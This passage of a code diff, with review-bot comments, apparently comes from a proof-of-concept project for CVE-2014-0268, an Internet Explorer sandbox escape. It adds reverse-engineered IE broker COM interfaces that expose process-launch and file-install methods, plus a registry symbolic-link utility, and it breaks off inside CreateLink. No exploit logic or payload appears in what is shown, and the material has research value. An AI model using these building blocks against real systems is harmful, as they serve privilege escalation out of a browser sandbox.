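+IIEUserBrokerPtr CreateBroker();
+IShdocvwBroker* CreateSHDocVw();
+bstr_t GetWindowsSystemDirectory();
+bstr_t GetExecutableFileName(HMODULE hModule);
+extern "C" int DeleteLink(LPCWSTR par_src);
+extern "C" int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile);
+bstr_t GetSessionPath();
+LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString);
+LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d);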
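Review bot: Utils.h has no include guard, unlike interfaces.h in the same commit which opens with `#pragma once`, and the CVE-2014-0268 project includes it twice in one translation unit (stdafx.h pulls in `<Utils.h>` and CVE-2014-0268.cpp includes it again); the duplicate function declarations compile today, but adding `#pragma once` as the first line keeps it that way if a definition or typedef ever lands here. The zero-argument `GetTempPath()` also collides with the Win32 `GetTempPath` A/W macro that Windows.h defines, so in this Unicode build the preprocessor turns it into a `GetTempPathW()` overload next to the real API, which is why the Win32 call and this helper look identical inside Utils.cpp; renaming it (for example `GetTempDirectory()`) would remove that trap for future readers.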
@ -0,0 +1,258 @@
#pragma once
#include <tchar.h>
#include <Windows.h>
#include <comdef.h>
#include <Shtypes.h>
#include <DocObj.h>
struct __declspec(uuid("1AC7516E-E6BB-4A69-B63F-E841904DC5A6")) IIEUserBroker : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE Initialize(HWND *, LPCWSTR, LPDWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CreateProcessW(DWORD pid, LPWSTR appName, LPWSTR cmdline, DWORD, DWORD, LPCSTR, WORD*, /* _BROKER_STARTUPINFOW*/ void *, /* _BROKER_PROCESS_INFORMATION */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WinExec(DWORD pid, LPCSTR, DWORD, DWORD*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCreateKnownObject(_GUID const &, _GUID const &, IUnknown * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstance() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstanceEx(DWORD pid, _GUID const &, IUnknown *, DWORD, _COSERVERINFO *, DWORD, /* tagBROKER_MULTI_QI */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoGetClassObject(DWORD pid, _GUID const &, DWORD, _COSERVERINFO *, _GUID const &, IUnknown * *) = 0;
|
||||
};
|
||||
|
||||
struct __declspec(uuid("BDB57FF2-79B9-4205-9447-F5FE85F37312")) CIEAxInstallBroker
|
||||
{
|
||||
};
|
||||
|
||||
struct __declspec(uuid("B2103BDB-B79E-4474-8424-4363161118D5")) IIEAxInstallBrokerBroker : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerGetAxInstallBroker(REFCLSID rclsid, REFIID riid, int unknown, int type, HWND, IUnknown** ppv) = 0;
|
||||
};
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIEAxInstallBrokerBroker, __uuidof(IIEAxInstallBrokerBroker));
|
||||
|
||||
struct ERF
|
||||
{
|
||||
//+0x000 erfOper : Int4B
|
||||
// + 0x004 erfType : Int4B
|
||||
// + 0x008 fError : Int4B
|
||||
|
||||
int erfOper;
|
||||
int erfType;
|
||||
int fError;
|
||||
};
|
||||
|
||||
struct FNAME
|
||||
{
|
||||
/*+0x000 pszFilename : Ptr32 Char
|
||||
+ 0x004 pNextName : Ptr32 sFNAME
|
||||
+ 0x008 status : Uint4B*/
|
||||
|
||||
char* pszFilenane;
|
||||
FNAME* pNextName;
|
||||
UINT status;
|
||||
};
|
||||
|
||||
struct SESSION
|
||||
{
|
||||
/*+0x000 cbCabSize : Uint4B
|
||||
+ 0x004 erf : ERF
|
||||
+ 0x010 pFileList : Ptr32 sFNAME
|
||||
+ 0x014 cFiles : Uint4B
|
||||
+ 0x018 flags : Uint4B
|
||||
+ 0x01c achLocation : [260] Char
|
||||
+ 0x120 achFile : [260] Char
|
||||
+ 0x224 achCabPath : [260] Char
|
||||
+ 0x328 pFilesToExtract : Ptr32 sFNAME*/
|
||||
|
||||
UINT cbCabSize;
|
||||
ERF erf;
|
||||
FNAME* pFileList;
|
||||
UINT cFiles;
|
||||
UINT flags;
|
||||
char achLocation[260];
|
||||
char achFile[260];
|
||||
char achCabPath[260];
|
||||
FNAME* pFilesToExtract;
|
||||
};
|
||||
|
||||
struct __declspec(uuid("BC0EC710-A3ED-4F99-B14F-5FD59FDACEA3")) IIeAxiInstaller2 : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE VerifyFile(BSTR, HWND__ *, BSTR, BSTR, BSTR, unsigned int, unsigned int, _GUID const &, BSTR*, unsigned int *, unsigned char **) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RunSetupCommand(BSTR, HWND__ *, BSTR, BSTR, BSTR, BSTR, unsigned int, unsigned int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InstallFile(BSTR sessionGuid, HWND__ *, BSTR sourcePath, BSTR sourceFile, BSTR destPath, BSTR destFile, unsigned int unk) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterExeFile(BSTR sessionGuid, BSTR cmdline, int unk, _PROCESS_INFORMATION *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterDllFile(BSTR, BSTR, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InstallCatalogFile(BSTR, BSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateLanguageCheck(BSTR, unsigned short const *, _FILETIME) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateModuleUsage(BSTR, char const *, char const *, char const *, char const *, unsigned int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EnumerateFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ExtractFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RemoveExtractedFilesAndDirs(BSTR, SESSION *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CreateExtensionsManager(BSTR, _GUID const &, IUnknown * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterDllFile2(BSTR, BSTR, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit2(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, int *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateAllowedDomainsList(_GUID const &, BSTR, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteExtractedFile(char const *) = 0;
|
||||
};
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIeAxiInstaller2, __uuidof(IIeAxiInstaller2));
|
||||
|
||||
struct __declspec(uuid("9AEA8A59-E0C9-40F1-87DD-757061D56177")) IIeAxiAdminInstaller : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE InitializeAdminInstaller(BSTR, BSTR, BSTR*) = 0;
|
||||
};
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIeAxiAdminInstaller, __uuidof(IIeAxiAdminInstaller));
|
||||
|
||||
struct __declspec(uuid("A4AAAE00-22E5-4742-ABB7-379D9493A3B7")) IShdocvwBroker : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE RedirectUrl(WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RedirectShortcut(WORD const *, WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RedirectUrlWithBindInfo(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NavigateUrlInNewTabInstance(/* _BROKER_BIND_INFO */ void *, /*_BROKER_REDIRECT_DETAIL */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptions(HWND *, WORD const *, WORD const *, long, ITEMIDLIST_ABSOLUTE * *, DWORD, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsZones(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsLanguages(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowPopupManager(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowCachesAndDatabases(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ConfigurePopupExemption(HWND *, int, WORD const *, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ConfigurePopupMgr(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RemoveFirstHomePage(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetHomePage(HWND *, long, ITEMIDLIST_ABSOLUTE * *, long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RemoveHomePage(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE FixInternetSecurity(HWND *, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowManageAddons(HWND *, DWORD, _GUID *, DWORD, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CacheExtFileVersion(_GUID const &, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAxApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SendLink(ITEMIDLIST_ABSOLUTE const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SendPage(HWND *, IDataObject *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NewMessage(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ReadMail(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetAsBackground(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSaveBrowseFile(HWND *, WORD const *, WORD const *, int, int, WORD * *, DWORD *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveAsComplete(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveAsFile(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE StartImportExportWizard(int, HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EditWith(HWND *, DWORD, HANDLE, DWORD, LPCWSTR, LPCWSTR, LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSaveImage(HWND *, WORD const *, DWORD, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveImage(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CreateShortcut(/* _internet_shortcut_params */ void*, int, HWND *, WORD *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSynchronizeUI(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE OpenFolderAndSelectItem(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoGetOpenFileNameDialog(/* _SOpenDlg */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoGetLocationPlatformConsent(HWND *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSaveFileName(HWND *, WORD const *, WORD const *, WORD const *, WORD const *, DWORD, WORD *, DWORD, WORD const *, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveFile(HWND *, DWORD, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE VerifyTrustAndExecute(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFeedByUrl(WORD const *, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerAddToFavoritesEx(HWND *, ITEMIDLIST_ABSOLUTE const *, WORD const *, DWORD, IOleCommandTarget *, WORD *, DWORD, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE Subscribe(HWND *, WORD const *, WORD const *, int, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MarkAllItemsRead(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MarkItemsRead(WORD const *, DWORD *, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE Properties(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteFeedItem(HWND *, WORD const *, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteFeed(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteFolder(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE Refresh(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MoveFeed(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MoveFeedFolder(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RenameFeed(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RenameFeedFolder(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NewFeedFolder(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE FeedRefreshAll(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowFeedAuthDialog(HWND *, WORD const *, /* FEEDTASKS_AUTHTYPE */ DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAddSearchProvider(HWND *, WORD const *, WORD const *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InitHKCUSearchScopesRegKey(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoShowDeleteBrowsingHistoryDialog(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE StartAutoProxyDetection(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EditAntiPhishingOptinSetting(HWND *, DWORD, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowMyPictures(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ChangeIntranetSettings(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE FixProtectedModeSettings(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAddService(HWND *, WORD const *, WORD const *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAddWebFilter(HWND *, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoBrowserRegister() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoBrowserRevoke(long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoOnNavigate(long, VARIANT *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE AddDesktopComponent(WORD *, WORD *, VARIANT *, VARIANT *, VARIANT *, VARIANT *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoOnCreated(long, IUnknown *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetShellWindows(IUnknown * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CustomizeSettings(short, short, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE OnFocus(int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsProtectedModeUrl(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoDiagnoseConnectionProblems(HWND *, WORD *, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE PerformDoDragDrop(HWND *, /* IEDataObjectWrapper */ void *, /* IEDropSourceWrapper */ void *, DWORD, DWORD, DWORD *, long *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE TurnOnFeedSyncEngine(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InternetSetPerSiteCookieDecisionW(WORD const *, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetAttachmentUserOverride(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WriteClassesOfCategory(_GUID const &, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerSetFocus(DWORD, HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconA(DWORD, /* _BROKER_NOTIFYICONDATAA */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconW(DWORD, /* _BROKER_NOTIFYICONDATAW */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DisplayVirtualizedFolder(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerSetWindowPos(HWND *, HWND *, int, int, int, int, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WriteUntrustedControlDetails(_GUID const &, WORD const *, WORD const *, DWORD, BYTE *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetComponentDeclined(char const *, char const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoShowPrintDialog(/* _BROKER_PRINTDLG */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NavigateHomePages(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAxDomainApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ActivateExtensionFromCLSID(HWND *, WORD const *, DWORD, DWORD, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateNewIEWindow(DWORD, _GUID const &, void * *, int, DWORD, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BeginFakeModalityForwardingToTab() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerEnableWindow(int, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EndFakeModalityForwardingToTab(HWND *, long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CloseOldTabIfFailed(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EnableSuggestedSites(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetProgressValue(HWND *, DWORD, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerStartNewIESession(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CompatDetachInputQueue(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CompatAttachInputQueue(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetToggleKeys(DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RepositionInfrontIE(HWND *, int, int, int, int, DWORD) = 0;
|
||||
//virtual HRESULT STDMETHODCALLTYPE ReportShipAssert(DWORD, DWORD, DWORD, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowOpenSafeOpenDialog(HWND *, /* _BROKER_SAFEOPENDLGPARAM */ void *, DWORD *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerAddSiteToStart(HWND *, WORD *, WORD const *, long, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SiteModeAddThumbnailButton(DWORD *, HWND *, WORD *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SiteModeAddButtonStyle(int *, HWND *, DWORD, WORD *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsSiteModeFirstRun(int, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsImmersiveSiteModeFirstRun(int, WORD const *, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetImmersivePinnedState(DWORD, int, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerDoSiteModeDragDrop(DWORD, long *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EnterUILock(long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE LeaveUILock(long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialAdd(/* _IECREDENTIAL */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialGet(WORD const *, WORD const *, /*_IECREDENTIAL */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialFindAllByUrl(WORD const *, DWORD *, /* _IECREDENTIAL */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialRemove(WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowOpenFile(HWND *, DWORD, DWORD, WORD *, WORD *, WORD const *, WORD const *, WORD const *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowImmersiveOpenFilePicker(HWND *, int, WORD const *, IUnknown * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterFileDragDrop(HWND *, DWORD, unsigned char *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RevokeFileDragDrop(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropA(HWND *, DWORD, char * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropW(HWND *, DWORD, WORD * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowEPMCompatDocHostConsent(HWND *, WORD const *, WORD const *, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetModuleInfoFromSignature(WORD const *, WORD * *, DWORD, WORD * *, WORD * *, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShellExecWithActivationHandler(HWND *, LPCWSTR, LPCWSTR, int, /* _MSLAUNCH_HANDLER_STATUS */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShellExecFolderUri(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowIMMessageDialog(HWND *, WORD const *, WORD const *, /* _IM_BUTTON_LABEL_ID */ void *, DWORD, DWORD, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFileHandle(HWND *, BSTR filename, BYTE * hash, DWORD hashlen, HANDLE*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MOTWCreateFileW(DWORD dwProcessId, BSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, int dwOpenMode, DWORD dwFlagsAndAttributes, ULONGLONG* h, DWORD *error) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MOTWFindFileW() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MOTWGetFileDataW() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WinRTInitializeWithWindow(IUnknown *, HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoProvisionNetworks(HWND *, WORD const *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetAccessibilityStylesheet(DWORD, unsigned __int64 *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetAppCacheUsage(WORD const *, unsigned __int64 *, unsigned __int64 *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE HiddenTabRequest(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* _HIDDENTAB_REQUEST_INFO */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetMaxCpuSpeed(DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetProofOfPossessionTokensForUrl(WORD const *, DWORD *, /* _IEProofOfPossessionToken */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetLoginUrl(LPWSTR*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ScheduleDeleteEncryptedMediaData() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsDeleteEncryptedMediaDataPending() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFrameAppDataPathA() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerHandlePrivateNetworkFailure() = 0;
|
||||
|
||||
};
|
||||
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIEUserBroker, __uuidof(IIEUserBroker));
|
||||
_COM_SMARTPTR_TYPEDEF(IShdocvwBroker, __uuidof(IShdocvwBroker));
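Review bot: The commented-out `ReportShipAssert` slot near the end of `IShdocvwBroker` shifts the vtable index of every method after it (`ShowOpenSafeOpenDialog` through `BrokerHandlePrivateNetworkFailure`), and nothing in the header records which IE/ieframe build these hand-reconstructed layouts were taken from; a broker vtable that is off by one slot dispatches these arguments into a different privileged method, so a header comment along the lines of `// Vtable order recovered from ieframe.dll <build>; ReportShipAssert is not present in that build.` (with the actual build filled in) belongs above the struct. The same provenance note applies to `IIEUserBroker` and `IIeAxiInstaller2`, whose `void *` placeholders for `_BROKER_STARTUPINFOW`, `SESSION` and friends are presumably reversed as well. Separately, `FNAME::pszFilenane` is misspelt relative to the `pszFilename` shown in the offset comment immediately above it.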
|
|
@ -0,0 +1,161 @@
|
|||
/*--------------------------------------------------------------------
|
||||
REGLN - Manage Windows Rregistry Links V20R0
|
||||
======================================================================
|
||||
Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
|
||||
|
||||
The following Copyrights apply:
|
||||
|
||||
Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
|
||||
Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
|
||||
Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
|
||||
|
||||
License:
|
||||
|
||||
This software is distributed under the terms and conditions of
|
||||
GPL - GNU General Public License. The software is provided AS
|
||||
IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
|
||||
responsibility for any damages or consequences of usage of this
|
||||
software. For more information, please read the attached GPL.TXT.
|
||||
|
||||
--------------------------------------------------------------------*/
|
||||
|
||||
#define _CRT_SECURE_NO_WARNINGS
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <wchar.h>
|
||||
#include "regln.h"
|
||||
#include "Utils.h"
|
||||
|
||||
|
||||
int checkargs(int argc, char *argv[]);
|
||||
char *win2ntapi(char *win, int len);
|
||||
int ntapi_init(void);
|
||||
int usage(void);
|
||||
|
||||
static fNtCreateKey NtCreateKey;
|
||||
static fNtDeleteKey NtDeleteKey;
|
||||
static fNtSetValueKey NtSetValueKey;
|
||||
|
||||
int DeleteLink(LPCWSTR par_src)
|
||||
{
|
||||
DWORD disposition, status;
|
||||
HANDLE hdl_nt_keyhandle;
|
||||
UNICODE_STRING nt_keyname;
|
||||
OBJECT_ATTRIBUTES nt_object_attributes;
|
||||
|
||||
ntapi_init();
|
||||
|
||||
nt_keyname.Buffer = par_src;
|
||||
nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
|
||||
|
||||
nt_object_attributes.ObjectName = &nt_keyname;
|
||||
nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE | REG_OPTION_OPEN_LINK_ATTR;
|
||||
nt_object_attributes.RootDirectory = NULL; //
|
||||
nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
|
||||
nt_object_attributes.SecurityQualityOfService = NULL; //
|
||||
nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
|
||||
|
||||
// open link
|
||||
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE, &disposition);
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: %ls opened successfully.\n", par_src);
|
||||
|
||||
// delete
|
||||
status = NtDeleteKey(hdl_nt_keyhandle);
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: %ls deleted successfully.\n", par_src);
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link deletion failed. [Step 2] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link deletion failed. [Step 1] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
};
|
||||
|
||||
int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile)
|
||||
{
|
||||
DWORD disposition, status;
|
||||
